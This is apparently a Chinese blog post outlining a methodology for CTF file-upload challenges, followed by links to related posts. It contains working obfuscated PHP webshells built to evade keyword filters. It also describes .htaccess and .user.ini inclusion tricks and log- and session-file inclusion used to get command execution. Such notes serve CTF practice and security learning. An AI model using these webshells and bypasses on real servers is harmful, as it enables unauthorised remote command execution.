文件上传做题流程

于 2024-02-22 18:44:00 发布
阅读量642 收藏 10
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mssqj/article/details/136240858
版权

1.前端过滤

第一步就是前端绕过了,可以把后边的删了,前边的改成files

就像这样

这样在前端就可以随便上传文件了

2.后端过滤

常见的是后端,也就是服务器端的过滤

注意后端对文件名的检测,抓到包之后放到repater里边进行测试,测试过滤。。

首先,排除内容过滤,先测文件名,文件后缀,看php文件是不是能上传。。

1.如果能传php

那就测试内容过滤,先写一个一句话木马,上传失败,就二分法检测过滤,具体检测到它过滤了那个单词。。

绕过

1.0  大小写绕过,SyStEm,

1.1  利用php字符串的连接性,例如sys.tem

1.2  

<?php

$a="s,y,s,t,e,m";

$b=explode(",",$a); 以','为分割符,将字符串拆分为数组

$c=$b[0].$b[1].$b[2].$b[3].$b[4].$b[5];

$c($_REQUEST['pass']);

?>

1.3

<?php

$a=substr("1sys",1)."tem";返回字符串中第一位以后的字符串

$a($_REQUEST['pass']);

?>

1.4

$a=strrev("metsys"); 反转字符串

$a($_REQUEST['pass'])

?>

1.5

<?php

$a=$_REQUEST['a'];

$b=$_REQUEST['b'];

$a($b);

?>

2.如果不能上传php

那麽就是图片了

一点要注意图片头的检测,加上GIF89a

................................................................................................................

首先考虑上传图片马,如果是apache服务器的,看到httpd,和apache有关,那就可以利用.htaccess来解析jpg.png.从而达到目的

..................................................................................................................

如果不是apache的那么就用.user.ini.  条件是上传路经中要

有php文件,然后上传特定文件名的图片,他就会被包含在那个PHP文件中

...................................................................................................................

然后看内容过滤,

过滤标签php

<? echo '123';?>

<?=(表达式)?>  等价于 <?php echo (表达式)?>

<% echo '123';%>

<script language=”php”>echo '123'; </script>

过滤[]

一句话木马中$_POST[]不能用,用{}替代

过滤()

eval 就不能用了,改echo `ls /` 直接命令

过滤了 `  `

用日志包含,

日志包含成功后,访问,UA传一句话木马

再post传参,这里用phpinfo()定位

a=system(ls /);phpinfo();感觉不好用,不如蚁剑直接连

过滤了  < >

这种最难,

日志包含

如果它不过滤php的话,可以先传一个index.php文件

然后.user.ini传一个auto_append_file=/var/log/nginx/access.log

然后进入/upload/index.php ,改UA ,连蚁剑

过滤php的话就user.ini.传

auto_append_file=1.png

再传1.png

GIF89a

<?= include "/var/lo"."g/nginx/access.lo"."g"?>

.............这样好像也不行。。有< >

标准方法是session包含

进行条件竞争

如果在上传.user.ini文件时过滤了.,

那么只能采用包含session文件的方法

.user.ini文件内容为

GIF89a

auto_prepend_file=/tmp/sess_shell

这样可以跳过上传图片马作为包含文件的跳板,直接使upload下的index.php文件包含session文件

需要编写一个向目标地址发送POST请求创建session文件的文件上传网页

注意点:

1.一句话木马传上了,但hacbar用不了,那就换bp抓包试一试

记得根据情况改传参方式,repater测试就完了,。

......................................................................................................................................

如果我上边所说的方法或名词你不知道,那么你可以先去学习一下,再来看。。

本文章只是总结一下思路和流程,反正就是一点点测试,找出对应最简便的做法。。

陌上笙清净
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
文件上传( upload-labs解题)
weixin_54475242的博客
04-12 293
文件上传解题 (绕过JS校验上传-前端) 例:upload-labs-master/Pass-01 上传一个php文件,可以看到有弹窗弹出,不被允许上传 2.将php文件后缀名改为jpg ,进行抓包 3.将“1.jpg”改为“1.php” forward一下 4.查看文档,存在PHP文件。即上传成功 文件头检测-服务器端 例:upload-labs-master/Pass-14 先用PHP文档测试一下,不行。随便输入一些数值进行抓包 将输入数值直接改为 GIF 89A(或者也可把所对应对
CTF从入门到提升(九)文件上传以及相关例题分享
anquanniu的博客
09-04 3659
文件上传主要是配合一些漏洞的利用,普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机,也就是我们所说的远程计算机,对站点来说,就是传到运行网站的服务器上。一般网站都有自己的逻辑,比如在网站的注册页面,你想要上传个头像,网站只需要你上传头像,而不是传其他类型的文件。 CTF上传文件的目的是get shell,我们最终目的是拿到题目的flag,如果说存在一个上传的地方,很有可能它的目的就...
文件上传思路总结
Flynn的博客
03-18 744
思路总结 当遇到js前端脚本限制上传文件类型 使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell 在前端js判断函数中加上可以上传php文件,或者直接删去这一函数 首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell 当服务器检测上传文件的MIME类型即媒体类型时 当上传PHP文件时,抓包发现Content-Type字段是application/x-php 这时只要修改为其他值即可 后端
文件上传的思路和步骤以及多文件上传、文件下载
qq_57039307的博客
06-15 381
文件上传的思路和步骤以及多文件上传、文件下载
文件上传绕过
qq_25987491的博客
04-16 1606
解题链接: http://ctf5.shiyanbar.com/web/upload 首先随手上传了一个图片,得到返回:再尝试php文件,得到返回很明显,题意为卡住php后缀,逼迫你上传文件后缀为jpg等类型,典型的上传绕过问题上传绕过解题思路可参考我转载的【文件上传检测的基本思路】,一般按照思路逐步尝试即可,简单的大小写,加后缀不可过,此题无js,猜测为0x00截断上传,此处仔细分析何为0x00...
一道文件上传漏洞的详细靶场写题流程——适合初学者
hyjcking的博客
10-18 996
我们上传制作的图片马,发现上传成功,我们尝试连接phpinfo,但是却发现没有生成phpinfo,猜测是没传到根目录下或者被改名字。由于apache存在的多后缀文件解析漏洞,这里上传一个x.php.xxx(这里任何不可识别的后缀都行),即可绕过该正则限制。2.打开该目录的cmd,输入copy 1.jpg/b +1.php 88.jpg,就会生成88.jpg的图片马。需要将php文件达成zip包,然后,绕过路经检测,通过路径穿越将文件放到指定目录,然后访问。3.生成66.jpg的夹心图片马。
自动化测试面试题总结.docx
05-07
3,linux文件的上传和下载 二、功能测试 1,工作中所遇到的错误 2,测试流程: 3,测试计划元素: 4,测试报告元素: 5,测试点: 6,测试方法: 7,bug相关问题 8,adb常用命令 9,软件测试原则 10,测试用例编写的...
8~15k,网络安全面试真题.pdf
02-05
18. 文件上传怎么绕过? 19. 怎么对文件内容过滤? 20. 怎么排查攻击来源? 21. 介绍下了解的中间件以及中间件漏洞? 22. 中间件日志分析、Windows、Linux日志分析? 23. 你觉得msf工具最好用的模块? 24. 之前工作...
JAVA上百实例源码以及开源项目
01-03
6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用...
java源码包---java 源码 大量 实例
04-18
6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用...
java源码包2
04-20
6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用...
CTF练习题——Upload上传的一道解题思路
Jum的博客
08-11 3012
好久没有去联系联系了,今天做了一道关于Upload的题,分享一下 目录 拿题目 找思路 得到结果 成功 拿题目 这道题目是百度CTF题目,题干如下: 找思路 题干中提示 tips:flag在flag.php中。看到题干后,可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代码来打开flag.php页面: <?php $fh=fopen('../flag.php','r'); echo fread($fh,filesize("../flag.php")); ...
WEB安全---文件上传2(upload-labs解题前十关)
qq_41759633的博客
08-09 573
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 第一关: ...
ctf文件上传基本思路+例题
limenzzz的博客
04-12 3659
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。 一句话木马 首先通过看一些题解和博.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
node-v18.18.2-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v7.7.3-headers.tar.xz
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
使用C#,生成特定格式Word文档
05-20
Word文档的自动化生成,可以根据数据自动形成文档
[简答题]简述HDFS上传文件工作流程
06-10
HDFS上传文件的工作流程如下: ...总的来说,HDFS上传文件工作流程可以分为三个阶段:文件上传准备阶段、数据块上传阶段和上传完成确认阶段。在这个过程中,客户端与 NameNode、DataNode 交互,完成文件上传任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值